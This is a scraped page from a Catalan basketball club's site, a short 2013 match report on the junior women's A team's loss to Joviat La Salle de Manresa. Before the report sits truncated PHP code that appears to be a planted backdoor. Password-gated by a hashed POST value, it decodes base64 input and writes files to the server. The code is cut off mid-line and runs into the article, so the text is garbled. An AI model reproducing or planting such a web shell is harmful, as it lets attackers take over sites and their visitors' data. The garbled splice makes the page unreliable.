function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení A no es pot refer de dos períodes nefastos - Tgn Bàsquet Club -

El júnior femení A no es pot refer de dos períodes nefastos

Updated: octubre 28, 2013

Vint minuts van ser suficients perquè el TGN Bàsquet enterrès les seves possibilitats de victòria contra el Joviat La Salle de Manresa. L’equip lila va encaixar un parcial de 21-40 entre el segon i tercer període i de res va servir el bon joc exhibit en els altres dos quarts. L’equip que entrena Jordi Crespo, que havia fet una defensa admirable a l’inici de partit es va enfonsar del minut 11 al 30 i això va permetre el conjunt visitant jugar a pler. Malgrat que en les últims cinc minuts les noies del TGN Bàsquet ho van provar, la diferència ja era inabastable i la victòria es va escapar del pavelló del Sagrat Cor.